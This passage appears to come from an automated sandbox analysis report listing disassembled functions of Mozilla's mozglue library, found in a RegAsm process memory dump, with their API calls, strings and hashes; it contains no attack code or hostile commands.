                                                                                                                                                        • Instruction Fuzzy Hash: F4F08C71E10745ABD7008F22C888A6AB778FFEB299F115316F90552612E7B0A5D18BE4
                                                                                                                                                        Function 6C62D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D4F2
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D50B
                                                                                                                                                          • Part of subcall function 6C60CFE0: EnterCriticalSection.KERNEL32(6C68E784), ref: 6C60CFF6
                                                                                                                                                          • Part of subcall function 6C60CFE0: LeaveCriticalSection.KERNEL32(6C68E784), ref: 6C60D026
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D52E
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7DC), ref: 6C62D690
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D751
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                        • String ID: MOZ_CRASH()
                                                                                                                                                        • API String ID: 3805649505-2608361144
                                                                                                                                                        • Opcode ID: be606b0672a3145f1e6ec215d767e9b27b67036acfce3df59a088aa273ab52bb
                                                                                                                                                        • Instruction ID: ae9cdd0ea885fec23e8f180e614072c5c27c1c32df0fd57160aeac4020ffda2c
                                                                                                                                                        • Opcode Fuzzy Hash: be606b0672a3145f1e6ec215d767e9b27b67036acfce3df59a088aa273ab52bb
                                                                                                                                                        • Instruction Fuzzy Hash: 8B51E171A057119FD714CF29C09465AB7E1EF8A304F648A2EE59AC7B84D774E800CFAA
                                                                                                                                                        Function 6C654630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                        • String ID: -%llu$.$profiler-paused
                                                                                                                                                        • API String ID: 3732870572-2661126502
                                                                                                                                                        • Opcode ID: 6141cc5d4aa306634c1a3fb1256876be7e94da086a4af53582ab490144020324
                                                                                                                                                        • Instruction ID: d1ec871751c192ae5b2b79bcd630f56bf4e8705052d913d0b7b66cb5dae4bc12
                                                                                                                                                        • Opcode Fuzzy Hash: 6141cc5d4aa306634c1a3fb1256876be7e94da086a4af53582ab490144020324
                                                                                                                                                        • Instruction Fuzzy Hash: 92417971E046149FCB08CF39D88116EB7F5EF86344F608A7DE8496BB81EB7088248799
                                                                                                                                                        Function 6C6546E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C654721
                                                                                                                                                          • Part of subcall function 6C604410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C643EBD,00000017,?,00000000,?,6C643EBD,?,?,6C6042D2), ref: 6C604444
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                        • String ID: -%llu$.$profiler-paused
                                                                                                                                                        • API String ID: 680628322-2661126502
                                                                                                                                                        • Opcode ID: 666581cd7572c423d0043e56fac8fcedf06c33707c9fb10d1702b2ed6f829c97
                                                                                                                                                        • Instruction ID: fb58bca4b24fca914ccfc38b5c52afcedd4bb5fb0a77e77c410fb1636f95b286
                                                                                                                                                        • Opcode Fuzzy Hash: 666581cd7572c423d0043e56fac8fcedf06c33707c9fb10d1702b2ed6f829c97
                                                                                                                                                        • Instruction Fuzzy Hash: 58313971F042185FCB0CCF6DD8816ADBBE6DB89314F64457EE8059B741E7B098148B98
                                                                                                                                                        Function 6C65B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C604290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C643EBD,6C643EBD,00000000), ref: 6C6042A9
                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C65B127), ref: 6C65B463
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C65B4C9
                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C65B4E4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                        • String ID: pid:
                                                                                                                                                        • API String ID: 1720406129-3403741246
                                                                                                                                                        • Opcode ID: b9e61665f701acecdcf9460d235a89296e9c8d0e6cbbaf11063e82f221e9d305
                                                                                                                                                        • Instruction ID: 8fba2bebcd48a43d6d78e7757818f979176525932cad394c5923cee92284dc78
                                                                                                                                                        • Opcode Fuzzy Hash: b9e61665f701acecdcf9460d235a89296e9c8d0e6cbbaf11063e82f221e9d305
                                                                                                                                                        • Instruction Fuzzy Hash: F8314A31A01208DFDB20DFA9D880AEEB7B5FF85308FA40529D85167B44D731E865CBE9
                                                                                                                                                        Function 6C64E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64E577
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64E584
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64E5DE
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C64E8A6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                        • API String ID: 1483687287-53385798
                                                                                                                                                        • Opcode ID: fc616c2f868cfbea320aa6623554e27fb383d0bf3b36e6199694fc7ba6e84e51
                                                                                                                                                        • Instruction ID: 996b92691461b326a0fc17fd2a5d01441f7b24a0f0f10136bafe02153d3445d4
                                                                                                                                                        • Opcode Fuzzy Hash: fc616c2f868cfbea320aa6623554e27fb383d0bf3b36e6199694fc7ba6e84e51
                                                                                                                                                        • Instruction Fuzzy Hash: 9211A131606254EFCB00DF16C888A69BBB4FFCA368F104A1AE85547651C770A805CFFE
                                                                                                                                                        Function 6C650C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C650CD5
                                                                                                                                                          • Part of subcall function 6C63F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C63F9A7
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C650D40
                                                                                                                                                        • free.MOZGLUE ref: 6C650DCB
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        • free.MOZGLUE ref: 6C650DDD
                                                                                                                                                        • free.MOZGLUE ref: 6C650DF2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4069420150-0
                                                                                                                                                        • Opcode ID: 04bef2330bdd769e759c27654f639f3e151f05aa89613f6eeef37a7108a25ebc
                                                                                                                                                        • Instruction ID: 30e9073084b3f18b1ed365ce119ab274e4f1009c8bbf8a557e0e2ac6d5ffda19
                                                                                                                                                        • Opcode Fuzzy Hash: 04bef2330bdd769e759c27654f639f3e151f05aa89613f6eeef37a7108a25ebc
                                                                                                                                                        • Instruction Fuzzy Hash: 574126759097809BD320CF29C0807AAFBE5BFC9718F618A2EE8D887750D770D455CB9A
                                                                                                                                                        Function 6C65CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65CDA4
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                          • Part of subcall function 6C65D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C65CDBA,00100000,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65D158
                                                                                                                                                          • Part of subcall function 6C65D130: InitializeConditionVariable.KERNEL32(00000098,?,6C65CDBA,00100000,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65D177
                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65CDC4
                                                                                                                                                          • Part of subcall function 6C657480: ReleaseSRWLockExclusive.KERNEL32(?,6C6615FC,?,?,?,?,6C6615FC,?), ref: 6C6574EB
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65CECC
                                                                                                                                                          • Part of subcall function 6C61CA10: mozalloc_abort.MOZGLUE(?), ref: 6C61CAA2
                                                                                                                                                          • Part of subcall function 6C64CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C65CEEA,?,?,?,?,00000000,?,6C64DA31,00100000,?,?,00000000), ref: 6C64CB57
                                                                                                                                                          • Part of subcall function 6C64CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C64CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C65CEEA,?,?), ref: 6C64CBAF
                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65D058
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 861561044-0
                                                                                                                                                        • Opcode ID: 191d814ade7243e4927add602529be419aba0e09f056ad875c45839257a497a1
                                                                                                                                                        • Instruction ID: aadda8a29249f98c0a0da1e1f6629ff8f943e4713d0a0fc3ed1eb3ac6ae98881
                                                                                                                                                        • Opcode Fuzzy Hash: 191d814ade7243e4927add602529be419aba0e09f056ad875c45839257a497a1
                                                                                                                                                        • Instruction Fuzzy Hash: A6D17F71A04B069FD708CF28C580B99F7E1BF89308F51862DD8598B752EB31A9A5CBC5
                                                                                                                                                        Function 6C625C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C625D40
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C625D67
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C625DB4
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C625DED
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 557828605-0
                                                                                                                                                        • Opcode ID: 04d3b1c65574b2da2ed8a31f73b62a2a7cb2934fc21ce9533deceee593f468f5
                                                                                                                                                        • Instruction ID: d1e97452b9950bf0d8876f3acf0b0509223b255072ff837191035bd3c3b5512e
                                                                                                                                                        • Opcode Fuzzy Hash: 04d3b1c65574b2da2ed8a31f73b62a2a7cb2934fc21ce9533deceee593f468f5
                                                                                                                                                        • Instruction Fuzzy Hash: A5519F71E011299FCF08CFA9C894AAEBBF1FB86304F198A19C811B7754C7346945CFA9
                                                                                                                                                        Function 6C60CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60CEBD
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C60CEF5
                                                                                                                                                        • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C60CF4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 438689982-4108050209
                                                                                                                                                        • Opcode ID: 69fe0ab8e535d75bafa102ee15a38e290033301ae0bef975dc7718ee1135a52b
                                                                                                                                                        • Instruction ID: cf2d5d59b6014886570fbafc15987747480079d711b56b60bc136fc94af99e0c
                                                                                                                                                        • Opcode Fuzzy Hash: 69fe0ab8e535d75bafa102ee15a38e290033301ae0bef975dc7718ee1135a52b
                                                                                                                                                        • Instruction Fuzzy Hash: 72512475A002169FCB04CF18C490AAABBB5EF99300F29859DD85A5F351D331ED06CBE1
                                                                                                                                                        Function 6C646470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6482BC,?,?), ref: 6C64649B
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6464A9
                                                                                                                                                          • Part of subcall function 6C63FA80: GetCurrentThreadId.KERNEL32 ref: 6C63FA8D
                                                                                                                                                          • Part of subcall function 6C63FA80: AcquireSRWLockExclusive.KERNEL32(6C68F448), ref: 6C63FA99
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C64653F
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64655A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3596744550-0
                                                                                                                                                        • Opcode ID: 69a2c869c14be11f2bf9a3f150791e8bafb8a90b517303083b89045c2fcc1eec
                                                                                                                                                        • Instruction ID: fd4ca506fffde02c85d8a7e069dda97a48b36a1019d5d70adac8b4235627fe52
                                                                                                                                                        • Opcode Fuzzy Hash: 69a2c869c14be11f2bf9a3f150791e8bafb8a90b517303083b89045c2fcc1eec
                                                                                                                                                        • Instruction Fuzzy Hash: 583181B5A04315AFD704CF14D88469EBBF4BF89314F10842DE85A87741D730E919CB9A
                                                                                                                                                        Function 6C61B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C61B4F5
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C61B502
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C61B542
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C61B578
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                        • Opcode ID: 5f563cb48ee766b355aa4667b63457671e9bc101580f22a31efe98632a63e901
                                                                                                                                                        • Instruction ID: a1ebd59653be8366ba2dd8dc37e38088fe1f47efd6fa4327ac5cdaf1e618bf5f
                                                                                                                                                        • Opcode Fuzzy Hash: 5f563cb48ee766b355aa4667b63457671e9bc101580f22a31efe98632a63e901
                                                                                                                                                        • Instruction Fuzzy Hash: C411CD70A09B41D7D3218F2AC8447A5B3B0FFD7319F10970AE84952F12EBB4A1C58BA9
                                                                                                                                                        Function 6C643DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C60F20E,?), ref: 6C643DF5
                                                                                                                                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C60F20E,00000000,?), ref: 6C643DFC
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C643E06
                                                                                                                                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C643E0E
                                                                                                                                                          • Part of subcall function 6C63CC00: GetCurrentProcess.KERNEL32(?,?,6C6031A7), ref: 6C63CC0D
                                                                                                                                                          • Part of subcall function 6C63CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6031A7), ref: 6C63CC16
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2787204188-0
                                                                                                                                                        • Opcode ID: e8b7e832de595010131592bf4e68111cac396404e543cae157baea22c0c8ae96
                                                                                                                                                        • Instruction ID: 1452657e7b44381007aaa0ca21381d55c1ee35edd29a3e6591a9ff7e42f326aa
                                                                                                                                                        • Opcode Fuzzy Hash: e8b7e832de595010131592bf4e68111cac396404e543cae157baea22c0c8ae96
                                                                                                                                                        • Instruction Fuzzy Hash: 74F0FEB15012187BD700AB55DC81DAB376DDB87624F044021FD0957741D675B92586FF
                                                                                                                                                        Function 6C6585B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6585D3
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C658725
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
